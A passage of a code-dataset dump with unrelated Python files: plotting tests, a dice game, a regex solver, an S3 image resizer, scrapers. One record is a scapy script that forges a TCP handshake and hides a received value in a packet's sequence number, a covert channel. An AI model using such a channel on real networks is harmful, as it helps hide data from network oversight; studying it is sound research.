font_size=30, viewport=True)\n plotter.add_mesh(pyvista.Cone(), color='g', show_edges=True,\n culling=True)\n plotter.add_bounding_box(render_lines_as_tubes=True, line_width=5)\n plotter.show_bounds(all_edges=True)\n\n plotter.update_bounds_axes()\n plotter.show()\n\n # Test subplot indices (2 rows by 1 column)\n plotter = pyvista.Plotter(shape=(2, 1), off_screen=OFF_SCREEN)\n # First row\n plotter.subplot(0,0)\n plotter.add_mesh(pyvista.Sphere())\n # Second row\n plotter.subplot(1,0)\n plotter.add_mesh(pyvista.Cube())\n plotter.show()\n\n # Test subplot indices (1 row by 2 columns)\n plotter = pyvista.Plotter(shape=(1, 2), off_screen=OFF_SCREEN)\n # First column\n plotter.subplot(0,0)\n plotter.add_mesh(pyvista.Sphere())\n # Second column\n plotter.subplot(0,1)\n plotter.add_mesh(pyvista.Cube())\n plotter.show()\n\n with pytest.raises(IndexError):\n # Test bad indices\n plotter = pyvista.Plotter(shape=(1, 2), off_screen=OFF_SCREEN)\n plotter.subplot(0,0)\n plotter.add_mesh(pyvista.Sphere())\n plotter.subplot(1,0)\n plotter.add_mesh(pyvista.Cube())\n plotter.show()\n\n\n # Test subplot 3 on left, 1 on right\n plotter = pyvista.Plotter(shape='3|1', off_screen=OFF_SCREEN)\n # First column\n plotter.subplot(0)\n plotter.add_mesh(pyvista.Sphere())\n plotter.subplot(1)\n plotter.add_mesh(pyvista.Cube())\n plotter.subplot(2)\n plotter.add_mesh(pyvista.Cylinder())\n plotter.subplot(3)\n plotter.add_mesh(pyvista.Cone())\n plotter.show()\n\n # Test subplot 3 on bottom, 1 on top\n plotter = pyvista.Plotter(shape='1|3', off_screen=OFF_SCREEN)\n # First column\n plotter.subplot(0)\n plotter.add_mesh(pyvista.Sphere())\n plotter.subplot(1)\n plotter.add_mesh(pyvista.Cube())\n plotter.subplot(2)\n plotter.add_mesh(pyvista.Cylinder())\n plotter.subplot(3)\n plotter.add_mesh(pyvista.Cone())\n plotter.show()\n\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_link_views():\n plotter = pyvista.Plotter(shape=(1, 4), off_screen=OFF_SCREEN)\n sphere = pyvista.Sphere()\n plotter.subplot(0, 0)\n plotter.add_mesh(sphere, smooth_shading=False, show_edges=False)\n plotter.subplot(0, 1)\n plotter.add_mesh(sphere, smooth_shading=True, show_edges=False)\n plotter.subplot(0, 2)\n plotter.add_mesh(sphere, smooth_shading=False, show_edges=True)\n plotter.subplot(0, 3)\n plotter.add_mesh(sphere, smooth_shading=True, show_edges=True)\n with pytest.raises(TypeError):\n plotter.link_views(views='foo')\n plotter.link_views([0, 1])\n plotter.link_views()\n with pytest.raises(TypeError):\n plotter.unlink_views(views='foo')\n plotter.unlink_views([0, 1])\n plotter.unlink_views(2)\n plotter.unlink_views()\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_orthographic_slicer():\n data = examples.load_uniform()\n data.set_active_scalars('Spatial Cell Data')\n\n slices = data.slice_orthogonal()\n\n # Orthographic Slicer\n p = pyvista.Plotter(shape=(2,2), off_screen=OFF_SCREEN)\n\n p.subplot(1,1)\n p.add_mesh(slices, clim=data.get_data_range())\n p.add_axes()\n p.enable()\n\n p.subplot(0,0)\n p.add_mesh(slices['XY'])\n p.view_xy()\n p.disable()\n\n p.subplot(0,1)\n p.add_mesh(slices['XZ'])\n p.view_xz(negative=True)\n p.disable()\n\n p.subplot(1,0)\n p.add_mesh(slices['YZ'])\n p.view_yz()\n p.disable()\n\n p.show()\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_remove_actor():\n data = examples.load_uniform()\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(data, name='data')\n plotter.add_mesh(data, name='data')\n plotter.add_mesh(data, name='data')\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_image_properties():\n mesh = examples.load_uniform()\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_mesh(mesh)\n p.show(auto_close=False) # DO NOT close plotter\n # Get RGB image\n _ = p.image\n # Get the depth image\n _ = p.get_image_depth()\n p.close()\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_mesh(mesh)\n p.show() # close plotter\n # Get RGB image\n _ = p.image\n # Get the depth image\n _ = p.get_image_depth()\n p.close()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_volume_rendering():\n # Really just making sure no errors are thrown\n vol = examples.load_uniform()\n vol.plot(off_screen=OFF_SCREEN, volume=True, opacity='linear')\n\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_volume(vol, opacity='sigmoid', cmap='jet', n_colors=15)\n plotter.show()\n\n # Now test MultiBlock rendering\n data = pyvista.MultiBlock(dict(a=examples.load_uniform(),\n b=examples.load_uniform(),\n c=examples.load_uniform(),\n d=examples.load_uniform(),))\n data['a'].rename_array('Spatial Point Data', 'a')\n data['b'].rename_array('Spatial Point Data', 'b')\n data['c'].rename_array('Spatial Point Data', 'c')\n data['d'].rename_array('Spatial Point Data', 'd')\n data.plot(off_screen=OFF_SCREEN, volume=True, multi_colors=True, )\n\n # Check that NumPy arrays work\n arr = vol[\"Spatial Point Data\"].reshape(vol.dimensions)\n pyvista.plot(arr, off_screen=OFF_SCREEN, volume=True, opacity='linear')\n\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_compar_four():\n # Really just making sure no errors are thrown\n mesh = examples.load_uniform()\n data_a = mesh.contour()\n data_b = mesh.threshold_percent(0.5)\n data_c = mesh.decimate_boundary(0.5)\n data_d = mesh.glyph()\n pyvista.plot_compare_four(data_a, data_b, data_c, data_d,\n disply_kwargs={'color':'w'},\n plotter_kwargs={'off_screen':OFF_SCREEN},)\n return\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_depth_peeling():\n mesh = examples.load_airplane()\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_mesh(mesh)\n p.enable_depth_peeling()\n p.disable_depth_peeling()\n p.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\n@pytest.mark.skipif(os.name == 'nt', reason=\"No testing on windows for EDL\")\ndef test_plot_eye_dome_lighting():\n mesh = examples.load_airplane()\n mesh.plot(off_screen=OFF_SCREEN, eye_dome_lighting=True)\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_mesh(mesh)\n p.enable_eye_dome_lighting()\n p.show()\n\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_mesh(mesh)\n p.enable_eye_dome_lighting()\n p.disable_eye_dome_lighting()\n p.show()\n\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_opacity_by_array():\n mesh = examples.load_uniform()\n # Test with opacity array\n mesh['opac'] = mesh['Spatial Point Data'] / 100.\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_mesh(mesh, scalars='Spatial Point Data', opacity='opac',)\n p.show()\n # Test with uncertainty array (transparency)\n mesh['unc'] = mesh['Spatial Point Data']\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_mesh(mesh, scalars='Spatial Point Data', opacity='unc',\n use_transparency=True)\n p.show()\n # Test using mismatched arrays\n with pytest.raises(RuntimeError):\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_mesh(mesh, scalars='Spatial Cell Data', opacity='unc',)\n p.show()\n # Test with user defined transfer function\n opacities = [0,0.2,0.9,0.2,0.1]\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_mesh(mesh, scalars='Spatial Point Data', opacity=opacities,)\n p.show()\n\n\ndef test_opacity_transfer_functions():\n n = 256\n mapping = pyvista.opacity_transfer_function('linear', n)\n assert len(mapping) == n\n mapping = pyvista.opacity_transfer_function('sigmoid_10', n)\n assert len(mapping) == n\n with pytest.raises(KeyError):\n mapping = pyvista.opacity_transfer_function('foo', n)\n with pytest.raises(RuntimeError):\n mapping = pyvista.opacity_transfer_function(np.linspace(0, 1, 2*n), n)\n foo = np.linspace(0, n, n)\n mapping = pyvista.opacity_transfer_function(foo, n)\n assert np.allclose(foo, mapping)\n foo = [0,0.2,0.9,0.2,0.1]\n mapping = pyvista.opacity_transfer_function(foo, n, interpolate=False)\n assert len(mapping) == n\n foo = [3, 5, 6, 10]\n mapping = pyvista.opacity_transfer_function(foo, n)\n assert len(mapping) == n\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_closing_and_mem_cleanup():\n n = 5\n for _ in range(n):\n for _ in range(n):\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n for k in range(n):\n p.add_mesh(pyvista.Sphere(radius=k))\n p.show()\n pyvista.close_all()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_above_below_scalar_range_annotations():\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_mesh(examples.load_uniform(), clim=[100, 500], cmap='viridis',\n below_color='blue', above_color='red')\n p.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_user_annotations_scalar_bar():\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_mesh(examples.load_uniform(), annotations={100.:'yum'})\n p.show()\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_volume(examples.load_uniform(), annotations={100.:'yum'})\n p.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_string_array():\n mesh = examples.load_uniform()\n labels = np.empty(mesh.n_cells, dtype=' \"OptimizationInput\":\n \"\"\"\n Creates a OptimizationInput schema.\n \"\"\"\n\n assert record.initial_molecule == initial_molecule.id\n if record.qc_spec.keywords:\n assert record.qc_spec.keywords == qc_keywords.id\n\n qcinput_spec = form_qcinputspec_schema(record.qc_spec, keywords=qc_keywords)\n\n model = qcel.models.OptimizationInput(\n id=record.id,\n initial_molecule=initial_molecule,\n keywords=record.keywords,\n extras=record.extras,\n hash_index=record.hash_index,\n input_specification=qcinput_spec,\n protocols=record.protocols,\n )\n return model\n","sub_path":"qcfractal/procedures/optimization.py","file_name":"optimization.py","file_ext":"py","file_size_in_byte":12109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"557290702","text":"\"\"\"Dice Math, by Al Sweigart al@inventwithpython.com\n\nTODO\"\"\"\n\n# TODO - this program needs more polish and refactoring.\n\nimport random, time\n\n# Set up the constants:\nQUIZ_DURATION = 30 # 30 seconds\nDICE_WIDTH = 9\nDICE_HEIGHT = 5\nSCREEN_WIDTH = 79\nSCREEN_HEIGHT = 24\nMIN_DICE = 2\nMAX_DICE = 5\n\nD1 = (['+-------+',\n '| |',\n '| O |',\n '| |',\n '+-------+'], 1)\n\nD2a = (['+-------+',\n '| O |',\n '| |',\n '| O |',\n '+-------+'], 2)\n\nD2b = (['+-------+',\n '| O |',\n '| |',\n '| O |',\n '+-------+'], 2)\n\nD3a = (['+-------+',\n '| O |',\n '| O |',\n '| O |',\n '+-------+'], 3)\n\nD3b = (['+-------+',\n '| O |',\n '| O |',\n '| O |',\n '+-------+'], 3)\n\nD4 = (['+-------+',\n '| O O |',\n '| |',\n '| O O |',\n '+-------+'], 4)\n\nD5 = (['+-------+',\n '| O O |',\n '| O |',\n '| O O |',\n '+-------+'], 5)\n\nD6a = (['+-------+',\n '| O O |',\n '| O O |',\n '| O O |',\n '+-------+'], 6)\n\nD6b = (['+-------+',\n '| O O O |',\n '| |',\n '| O O O |',\n '+-------+'], 6)\n\nALL_DICE = [D1, D2a, D2b, D3a, D3b, D4, D5, D6a, D6b]\n\nprint(\"\"\"Dice Math, by Al Sweigart al@inventwithpython.com\n\nTODO blah blah 30 seconds \"\"\")\n\ncorrectAnswers = 0\nincorrectAnswers = 0\nstartTime = time.time()\nwhile time.time() < startTime + QUIZ_DURATION: # Main game loop.\n # Come up with the dice to display:\n sumAnswer = 0\n diceFaces = []\n for i in range(random.randint(MIN_DICE, MAX_DICE)):\n die = random.choice(ALL_DICE)\n diceFaces.append(die[0])\n sumAnswer += die[1]\n\n # Place dice on canvas:\n topLeftDiceCorners = []\n for i in range(len(diceFaces)):\n while True: # Keep looping until we find a non-overlapping place for the die.\n x = random.randint(0, SCREEN_WIDTH - 1 - DICE_WIDTH)\n y = random.randint(0, SCREEN_HEIGHT - 1 - DICE_HEIGHT - 3) # -3 so we have room to enter the sum\n\n overlaps = False\n for prevDie in topLeftDiceCorners:\n topLeftX = x\n topLeftY = y\n topRightX = x + DICE_WIDTH\n topRightY = y\n bottomLeftX = x\n bottomLeftY = y + DICE_HEIGHT\n bottomRightX = x + DICE_WIDTH\n bottomRightY = y + DICE_HEIGHT\n\n for cornerx, cornery in ((topLeftX, topLeftY), (topRightX, topRightY), (bottomLeftX, bottomLeftY), (bottomRightX, bottomRightY)):\n if (prevDie[0] <= cornerx < (prevDie[0] + DICE_WIDTH)) and (prevDie[1] <= cornery < (prevDie[1] + DICE_HEIGHT)):\n overlaps = True\n if not overlaps:\n break\n topLeftDiceCorners.append((x, y))\n\n # Draw on canvas:\n canvas = {} # Keys are (x, y) tuples of ints, values are one-char strings.\n for i, dieCorner in enumerate(topLeftDiceCorners):\n for ix in range(DICE_WIDTH):\n for iy in range(DICE_HEIGHT):\n # TODO add comment explaining this:\n canvas[(dieCorner[0] + ix, dieCorner[1] + iy)] = diceFaces[i][iy][ix]\n\n # Display canvas on the screen:\n for y in range(SCREEN_HEIGHT):\n for x in range(SCREEN_WIDTH):\n print(canvas.get((x, y), ' '), end='')\n print() # Print a newline.\n\n response = input('Enter the sum: ').strip()\n if response.isdecimal() and int(response) == sumAnswer:\n correctAnswers += 1\n else:\n incorrectAnswers += 1\n\nprint('Correct: ', correctAnswers)\nprint('Incorrect:', incorrectAnswers)\nprint('Score: ', (correctAnswers * 3) - incorrectAnswers)\n","sub_path":"src/gamesbyexample/dicemath.py","file_name":"dicemath.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"47413644","text":"# class Solution:\n# def isMatch(self, s, p):\n# temp=0\n# for x in range(len(p)):\n# if temp>len(s)-1 or x>len(p)-1:\n# return False\n# if p[x]==\".\":\n# temp+=1\n# elif p[x]==\"*\":\n# if p[x-1]==\".\":\n# return True\n# while temp 0 and (s[i-1]\n == p[j-2] or p[j-2] == '.') and dp[i-1][j])\n else:\n dp[i][j] = i > 0 and dp[i-1][j -\n 1] and (s[i-1] == p[j-1] or p[j-1] == '.')\n return dp[m][n]\n\n\n# solution = Solution()\n# print(solution.isMatch(\"ab\", \".*c\"))\n\nprint(dp(\"ab\", \".*c\"))\n","sub_path":"10. Regular Expression Matching.py","file_name":"10. Regular Expression Matching.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"241556219","text":"from scapy.all import *\nimport base64\nimport logging\nlogging.getLogger('scapy.runtime').setLevel(logging.ERROR)\nfrom threading import Timer\nimport time\nimport xlrd\nimport string\nfrom socket import *\nimport psutil\nimport base64\n\ndef start_tcp(target_ip,target_port,source_port):\n print('正在握手')\n global sport,s_seq,d_seq #主要是用于TCP3此握手建立连接后继续发送数据\n try:\n #第一次握手,发送SYN包\n #ans = sr1(IP(dst=target_ip)/TCP(dport=target_port,sport=source_port,seq=RandInt(),flags='S'),verbose=False)\n ans = sr1(IP(dst=target_ip)/TCP(dport=target_port,sport=source_port,seq=0,flags='S',options=[('MSS',48),('SAckOK', '')]),verbose=False)\n #ans.show()\n sport = ans[TCP].dport #源随机端口\n s_seq = ans[TCP].ack #源序列号(其实初始值已经被服务端加1)\n d_seq = ans[TCP].seq + 1 #确认号,需要把服务端的序列号加1\n #第三次握手,发送ACK确认包\n send(IP(dst=target_ip)/TCP(dport=target_port,sport=source_port,ack=d_seq,seq=s_seq,flags='A'),verbose=False)\n print('TCP三次握手成功!!')\n\n except Exception:\n print(\"TCP连接出错!!\")\n time.sleep(1)\n return ans,d_seq,s_seq\ndef Read_excel(file_path):\n wb = xlrd.open_workbook(filename=file_path)#打开文件\n sheet1 = wb.sheet_by_index(0)#通过索引获取表格\n cols2 = sheet1.col_values(2) #获取表单第3列的数据(间隔时间)\n cols3 = sheet1.col_values(3) #获取表单第4列的数据(发包数量)\n cols4 = sheet1.col_values(4) #获取表单第5列的数据(发包总字节数)\n return cols2, cols3, cols4\n \ndef Read_txt(file_path):\n info1 = []\n info2 = []\n info3 = []\n for line in open(file_path):\n info1.append(line.split(',')[0])\n info2.append(line.split(',')[1])\n info3.append(line.split(',')[2])\n \n return info1, info2,info3\ndef add_pkt(seq_value,blen,target_ip,target_port,my_ip): #根据TXT传入数据中的一行补充一个包\n blenadd=int(blen)#-40\n if blenadd <=0:\n blenadd=0\n if blenadd >= 1600:\n blenadd=1600\n #seq_value=int(seq_value)\n print(seq_value,blenadd)\n datas4 = ''.join(random.sample(string.ascii_letters*300 + string.digits, int(blenadd)))\n datas4 = datas4.encode('utf-8')\n ip = IP(src=my_ip,dst=target_ip)\n tcp = TCP(sport=source_port,dport=80,flags='PA',seq=seq_value,ack=1) #附带seq隐蔽信息的包\n pkt =ip/tcp/datas4\n send(pkt,verbose=0)\ndef add_pkt_loop(info,seq_hidden,target_ip,target_port,my_ip):\n\tfor i in range(1,len(info3)):\n\t\tif i==1:\n\t\t\tblen=int(info3[0])\n\t\telse:\n\t\t\tblen=int(info3[i-1])-int(info3[i-2])\n\t\tif i==int(where_is):\n\t\t\tadd_pkt(seq_hidden,blen,target_ip,target_port,my_ip)\n\t\telse:\n\t\t\tadd_pkt(int(info3[i-1]),blen,target_ip,target_port,my_ip)\n\t\ttime.sleep(1)\ndef TCP_wave():\n print('FIN正在发送') \n send(IP(dst=target_ip)/TCP(dport=target_port,sport=source_port,flags=17),verbose=False) \ndef Listen_con(ip):\n ADDR = (ip, 8080)\n tcpSerSock = socket(AF_INET, SOCK_STREAM)\n tcpSerSock.bind(ADDR)\n tcpSerSock.listen(5)\n print('waitting for connect')\n tcpCliSock, addr = tcpSerSock.accept()\n print('连接成功!!!')\n return tcpCliSock\n\ndef Get_ip():\n info = psutil.net_if_addrs() # 返回类似ipconfig的功能\n print(info['WLAN'][1][1])\n return info['WLAN'][1][1]\n\ndef seq_scapy(ip):\n ip = ip#\"192.168.1.100\"#Get_ip()\n dst_socket = Listen_con(ip)\n rev_msg = dst_socket.recv(1024)\n rev_msg_str =base64.b64decode(rev_msg.decode('utf-8'))\n rev_msg_int =int(base64.b64decode(rev_msg.decode('utf-8')))\n #print(rev_msg_int)\n send_msg = rev_msg\n dst_socket.send(send_msg)\n\n #dst_socket = Listen_con(ip)\n rev_msg2 = dst_socket.recv(1024)\n rev_msg2_str =base64.b64decode(rev_msg2.decode('utf-8'))\n rev_msg2_int =int(base64.b64decode(rev_msg2.decode('utf-8')))\n #print(rev_msg2_int)\n send_msg2 = rev_msg2\n dst_socket.send(send_msg2)\n return rev_msg_int,rev_msg2_int\nif __name__ == '__main__':\n my_ip ='192.168.1.102'\n rev_msg_int,rev_msg2_int=seq_scapy(my_ip)\n target_ip = '192.168.1.109'#input('请你输入目的主机的IP地址: ')\n target_port = 80#int(input('请你输入目的主机端口号: '))\n source_port = random.randint(1024, 65535)#源端口\n info1, info2 ,info3= Read_txt('1.txt')\n where_is=20\n print('读取完成')\n print('准备连接并发包')\n seq_hidden =rev_msg2_int#int(input('存储隐蔽信道内容(int):'))\n time.sleep(0.5)\n start_tcp(target_ip,target_port,source_port)\n add_pkt_loop(info3,seq_hidden,target_ip,target_port,my_ip)\n TCP_wave()\n","sub_path":"work/scapy_tcp4端不带key包比较总包长/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":4974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"346684878","text":"import io\nimport os\nimport urllib\n\nfrom app import config\n\nfrom boto.s3.connection import S3Connection\nfrom boto.s3.key import Key\n\nfrom PIL import Image\n\n\ndef s3_change_image_resolutions(image_route, filename):\n conn = S3Connection(config.AWS_ACCESS_KEY_ID, config.AWS_SECRET_ACCESS_KEY)\n bucket = conn.get_bucket(config.AWS_IMAGE_BUCKET)\n key = Key(bucket)\n\n url = \"{}/{}/{}\".format(config.AWS_IMAGES_BASE, image_route, filename)\n # Retrieve our source image from a URL\n fp = urllib.urlopen(url)\n content_type = fp.info().get('content-type')\n # Load the URL data into an image\n img = io.StringIO(fp.read())\n img_original = Image.open(img)\n\n change_image_resolution(image_route, filename, img_original, content_type, 500, key)\n change_image_resolution(image_route, filename, img_original, content_type, 1000, key)\n change_image_resolution(image_route, filename, img_original, content_type, 2000, key)\n change_image_resolution(image_route, filename, img_original, content_type, 4000, key)\n change_image_resolution(image_route, filename, img_original, content_type, 6000, key)\n\n img.close()\n fp.close()\n\n\ndef update_image_headers(image_route, filename):\n conn = S3Connection(config.AWS_ACCESS_KEY_ID, config.AWS_SECRET_ACCESS_KEY)\n bucket = conn.get_bucket(config.AWS_IMAGE_BUCKET)\n key = Key(bucket)\n\n url = \"{}/{}/{}\".format(config.AWS_IMAGES_BASE, image_route, filename)\n # Retrieve our source image from a URL\n fp = urllib.urlopen(url)\n content_type = fp.info().get('content-type')\n # Load the URL data into an image\n img = io.StringIO(fp.read())\n\n # img.seek(0, os.SEEK_END)\n # content_length = img.tell()\n # img.seek(0)\n\n key.key = '{}/{}'.format(image_route, filename)\n key.set_contents_from_string(img.getvalue(),\n headers={'Content-Type': content_type,\n 'x-amz-meta-Cache-Control': 'max-age=31536000',\n 'Cache-Control': 'max-age=31536000'},\n replace=True,\n policy='public-read')\n img.close()\n\n\ndef change_image_resolution(image_route, filename, img_original, content_type, width, key):\n # Resize the image\n new_size = get_width_height(img_original.size, width)\n img_resized = img_original.resize(new_size, Image.NEAREST)\n\n # NOTE, we're saving the image into a StringIO object to avoid writing to disk\n out_location = io.StringIO()\n file_type = get_file_type(content_type)\n img_resized.save(out_location, file_type)\n\n key.key = '{}/{}'.format(image_route, new_filename(filename, width))\n key.set_contents_from_string(out_location.getvalue(),\n headers={'Content-Type': content_type,\n 'x-amz-meta-Cache-Control': 'max-age=31536000',\n 'Cache-Control': 'max-age=31536000'},\n replace=True,\n policy='public-read')\n out_location.close()\n\n\ndef get_file_type(content_type):\n c, ext = content_type.split('/')\n return ext\n\n\ndef get_width_height(original_size, width):\n if width >= original_size[0]:\n return original_size\n percent = float(width) / float(original_size[0])\n height = int(original_size[1] * percent)\n return (width, height)\n\n\ndef new_filename(filename, width):\n name, ext = os.path.splitext(filename)\n if width <= 500:\n additional_name = 'thumbnail'\n elif width <= 1000:\n additional_name = 'small'\n elif width <= 2000:\n additional_name = 'medium'\n elif width <= 4000:\n additional_name = 'large'\n elif width <= 6000:\n additional_name = 'grande'\n else:\n additional_name = 'jumbo'\n return \"{}_{}\".format(name, additional_name)\n","sub_path":"app/utils/aws.py","file_name":"aws.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"367919035","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom pandas import ExcelWriter\n\n\n\n\ndf = pd.DataFrame(columns=['DataAprovacao', 'UF', 'ValorAprovado'])\n\nurl = r'http://www2.esporte.gov.br/leiincentivo/leiIncentivoEsporte/consultaProjetosAprovadosAptosCaptacao.do?acao=consultar&dtInicio=01%2F01%2F2018&dtFinal=31%2F12%2F2018&sgUf=&municipioVO.idMunicipio=&nrSLIE=&nmProponente=&nmProjeto=&modalidadeEsportivaVO.idModalidadeEsportiva=0&areaFinalisticaVO.idAreaFinalistica=0&nrProcesso='\n\n\n#url=r'http://www2.esporte.gov.br/leiincentivo/leiIncentivoEsporte/consultaProjetosAprovadosAptosCaptacao.do?acao=consultar&dtInicio=01%2F01%2F2019&dtFinal=30%2F01%2F2019&sgUf=&municipioVO.idMunicipio=&nrSLIE=&nmProponente=&nmProjeto=&modalidadeEsportivaVO.idModalidadeEsportiva=0&areaFinalisticaVO.idAreaFinalistica=0&nrProcesso='\npage = requests.get(url)\nsoup = BeautifulSoup(page.content, 'html.parser')\nx = soup.find_all('table', class_='tabelaConteudo')\nufs = []\nfor item in range(1, len(x)):\n uf = x[item].select('td b')[5]\n uf = uf.contents[0]\n data_aprovacao = x[item].select('td b')[15]\n data_aprovacao = data_aprovacao.contents[0]\n valor_aprovado = x[item].select('td b')[11]\n valor_aprovado = valor_aprovado.contents[0]\n df = df.append({'UF': uf, 'DataAprovacao': data_aprovacao, 'ValorAprovado' : valor_aprovado}, ignore_index=True)\n\n\npage = requests.get(url)\nsoup = BeautifulSoup(page.content, 'html.parser')\nx = soup.find_all(class_='strong alignRight')\nufs = []\nfor item in range(1, len(x)):\n ufs.append(x[item].contents[0].contents[0])\n\n\n\nufs.insert(0,'0,00')\n\n\n\ndf['ValorCaptado'] = ufs\n\n\n\nwriter = ExcelWriter(r'C:\\Users\\gustavomartins\\Desktop\\df1.xlsx')\ndf.to_excel(writer,'Sheet1', index=False)\nwriter.save()","sub_path":"codigos/crawler_projetos_2018.py","file_name":"crawler_projetos_2018.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"191926516","text":"#!/usr/bin/env python\n# Basic\nimport sys\nimport os\nimport pdb\nimport gc\n# Analysis\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom math import *\nsys.path.append(os.environ['HOME']+'/projects/bob-analysis')\nfrom scan_run_read import ScanFinal\nfrom seed_data import uc\n\n'''\nName: figK-N_frac_succ_vs_param_value.py\nDescription: Program to make Fig5K-N Fraction success vs single parameter statscan runs\nInput: This directory should contain _Seed_Criteria.dat from scan files of differing parameters\nOutput: Scatter plot with error bars showing the successful fraction vs the designated parameter value.\n'''\n\nclass Fig5KN():\n def __init__(self, dir_path):\n self.dir_path = os.path.abspath(dir_path)\n self.title_prefix = self.dir_path.split('/')[-1]\n self.dat_files = []\n self.scan_list = []\n self.GetScans()\n\n def GetScans(self):\n self.dat_files += [ f for f in os.listdir(self.dir_path) if f.endswith('.dat')]\n self.dat_files.sort(reverse=True)\n # Comment this\n for f in self.dat_files:\n self.scan_list += [ScanFinal(f)]\n self.scan_list[-1].scatter_flag = True\n\n def GraphSuccFracScatter(self):\n font ={'size' : 20,\n 'family' : 'Times'}\n mpl.rc('font', **font)\n mpl.rc('text', usetex=True)\n # fig, axarr = plt.subplots(5,1, figsize=(20,30))\n\n for sr in self.scan_list:\n p = sr.GetParam()\n fig = plt.figure()\n ax = plt.subplot()\n sr.GraphSuccessPercentBar(ax, p, cbflag=False)\n self.ModifyXLabel(ax, p)\n plt.draw()\n ax.xaxis.set_major_locator(mpl.ticker.MaxNLocator())\n plt.tight_layout()\n plt.savefig(r'{}_{}.pdf'.format(self.title_prefix, p))\n fig.clf()\n plt.close()\n gc.collect()\n\n def ModifyXLabel(self, ax, p):\n if p == 'N':\n ax.set_xlabel(r'Number of Crosslinkers')\n elif p == 'svs':\n ax.set_xlabel(r'Shrinking Speed Stabilization Factor')\n elif p == 'svg':\n ax.set_xlabel(r'Growth Speed Stabilization Factor')\n elif p == 'sfr':\n ax.set_xlabel(r'Rescue Frequency Stabilization Factor')\n elif p == 'sfc':\n ax.set_xlabel(r'Catastrophe Frequency Stabilization Factor')\n elif p == 'fc':\n ax.set_xlabel(r'Catastrophe Frequency (min$^{-1}$)')\n elif p == 'fr':\n ax.set_xlabel(r'Rescue Frequency (min$^{-1}$)')\n elif p == 'vg':\n ax.set_xlabel(r'Growth Speed ($\\mu$m/min)')\n elif p == 'vs':\n ax.set_xlabel(r'Shrinking Speed ($\\mu$m/min)')\n elif p == 'wf':\n ax.set_xlabel(r'Asymptotic Wall Force (pN)')\n\n\n##########################################\nif __name__ == \"__main__\":\n dir_path = sys.argv[1]\n a = Fig5KN(dir_path)\n a.GraphSuccFracScatter()\n\n\n\n\n","sub_path":"Spindles/Ase1_paper/figK-N_frac_succ_vs_param_value.py","file_name":"figK-N_frac_succ_vs_param_value.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"165798838","text":"\nimport requests, langdetect\n\n\nurl = \"https://www.bibsonomy.org/json/search/bibliometrie?items=1000\"\n\nresponse = requests.get(url)\n\ndata = response.json()\n\nitems = data[\"items\"]\n\n\npublications = [item for item in items if item[\"type\"] == \"Publication\"]\n\n\nger_publications = [item for item in publications\n if langdetect.detect(item[\"label\"]) == \"de\"]\n\n\nger_pubs_with_abstract = [item for item in ger_publications if \"abstract\" in item]\n\ncount = 0\nfor publication in ger_pubs_with_abstract:\n count = count + 1\n \n bereinigt = (\"[\" + str(count) + \".]\" + \"\\n\\n\" + publication[\"label\"] + \"\\n\\n\"\n + publication[\"abstract\"] + \"\\n\\n\")\n with open(\"bibsonomy_to_lingo.txt\", \"a\") as txt_file:\n txt_file.write(bereinigt)\n\n\n\n\n\n\n\n\n \n\n","sub_path":"Modul_2/Aufgabe 2.1 Bibsonomy.py","file_name":"Aufgabe 2.1 